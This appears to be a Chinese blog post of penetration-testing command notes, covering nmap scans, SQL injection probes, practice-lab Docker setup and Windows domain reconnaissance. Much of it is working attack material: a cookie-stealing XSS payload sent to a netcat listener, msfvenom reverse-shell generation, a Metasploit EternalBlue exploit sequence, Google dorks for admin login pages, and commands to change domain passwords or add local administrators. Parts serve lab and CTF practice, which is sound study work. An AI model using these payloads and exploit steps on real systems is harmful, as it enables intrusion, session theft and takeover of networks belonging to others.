安全相关常用操作命令备忘
1、nmap扫描
Intense scan,10000端口 nmap -T4 -A -v 10.10.10.10 --Intense scan, all TCP ports nmap -p 1-65535 -T4 -A -v 10.10.10.10 Intense scan, no ping nmap -T4 -A -v -Pn 10.10.10.10 Slow comprehensive scan nmap -sS -sU -T4 -A -v -PE -PP -PS80,443 -PA3389 -PU40125 -PY -g 53 --script "default or (discovery and safe)" 10.10.10.10 版本探测 : -sV 操作系统 : -O -oN <File>
2、三组六条
# 单引号注 1' and 1='1 # and连接,若查询1结果正确,返回值为真 1' and 1='2 # and连接,若查询1结果正确,返回值为假 # 双引号注 1" and 1="1 # and连接,若查询1结果正确,返回值为真 1" and 1="2 # and连接,若查询1结果正确,返回值为假 # 数字型注 1 and 1=1 # and连接,若查询1结果正确,返回值为真 1 and 1=2 # and连接,若查询1结果正确,返回值为假
3、盲注
1' and ascii(substr((select f1a9 from Fl4g),1,1)) = 72#
4、docker靶场
kali安装docker:
apt install docker.io
kali安装docker-compose:
# 安装python curl -s https://bootstrap.pypa.io/get-pip.py | python3 # 安装docker-compose pip3 install docker-compose # 安装成功 docker-compose -v
使用Portainer管理Docker
Portainer的Hub地址是:https://hub.docker.com/r/portainer/portainer/ 运行命令是: mkdir -p /docker/portainer_data cd /docker docker volume create portainer_data --每次启动 portainer时该命令需要运行 docker run -it -d -p 9000:9000 --privileged --name portainer -v /var/run/docker.sock:/var/run/docker.sock -v portainer_data:/data portainer/portainer 访问你的IP:9000即可进入容器管理页面 docker run --name portainer -it -d -P portainer/portainer
dvwa漏洞平台:
docker pull daocloud.io/liusheng/dvwa:master-383e725 docker run -dit -p 8083:80 daocloud.io/liusheng/dvwa:master-383e725
webug平台:
docker run -dit -p 8084:80 area39/webug docker pull area39/webug docker exec -it 4664371b733b /bin/bash docker container update --restart=always {容器ID}
开源docker 靶场:
https://github.com/vulhub/vulhub 文件上传靶场: docker run -dit -p 8391:80 c0ny1/upload-labs sql注入靶场: docker run -dit -p 8392:80 acgpiano/sqli-labs
5、秋名山
import requests import re url = 'http://120.24.86.145:8002/qiumingshan/' s = requests.Session() source = s.get(url) expression = re.search(r'(\d+[+\-*])+(\d+)', source.text).group() result = eval(expression) post = {'value': result} print(s.post(url, data = post).text)
6、接收cookie
nc -lnvp 8899 <script>window.location.href = "http://192.168.133.131:8899/?cookie="%2bdocument.cookie;</script>
7、ms17_010
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.31.98 LPORT=9999 -f exe > shell.exe use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.31.98 Run search ms17_010 use exploit/windows/smb/ms17_010_eternalblue set payload windows/x64/meterpreter/reverse_tcp show options set rhost 192.168.31.50 set lhost 192.168.31.98 exploit shell
8、Google Hacking
1)基本命令:
intitle: 从网页标题中搜索指定的关键字 inurl: 从url中搜索指定的关键字 intext: 从网页中搜索指定的关键字 filetype: 搜索指定的文件后缀 site: 在某个指定的网站内搜索指定的内容 link: 搜索与该链接有关的链接
2)通配符(+-前需加一个空格):
+ 强制包含某个字符进行查询 - 查询时忽略某个字符 "" 查询时精确匹配双引号内的字符 . 匹配某单个字符进行查询 * 匹配任意字符进行查询 | 或者逗号(,)多个选择,只要有一个关键字匹配即可
3)举例:
inurl:/admin intext:后台管理系统 site:"some-keywords.com" intitle:loginin intext:intext:管理|后台|登陆|用户名|密码|验证码|系统|帐号|manage|admin|login|system
9、windows信息收集
1)当前shell权限
whoami /user whoami /priv
2)查看系统信息
systeminfo
3)网络连接信息
netstat -ano|findstr "3389"
4)操作系统
ver
5)杀软
wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName /Format:List
6)当前安装程序
wmic product get name, version
7)在线用户
quser
8)查进程
tasklist /v
9)当前登录的域
net config workstation
10)远程连接历史
cmdkey /l
11)查看本机帐号
net user xxx net user /domain 显示所在域的用户名单 net user 域用户/ domain 获取某个域用户的详细信息 net user /domain XXX 12345678 修改域用户密码,需要域管理员权限 nltest /domain_trusts /all_trusts /v /server:192,168.xx.xx 返回所有信任192.168.xx.xx nltest /dsgetdc:hack /server:192.168.xx.xx 返回域控和其相应的IP地址 net user /do 获取域用户列表 net group "domain admins" /domain 获取域管理员列表 net group "domain controllers" /domain 查看域控制器(如果有多台) net group" domain computers" /domain 查看域机器n net group /domain 查询域里面的工作组 net localgroup administrators 本机管理员(通常含有域用户) net localgroup administrators /domain 登录本机的域管理员 net localgroup administrators workgroup\useroo1 /add 域用户添加到本机 net view 查看同一域内机器列表 net view \\ip 查看某IP共享 net view \\XXX 查看XXX计算机的共享资源列表 net view /domain 查看内网存在多少个域 net view /domain:XYZ 查看XYZ域中的机器列表
分类: 安全
近期评论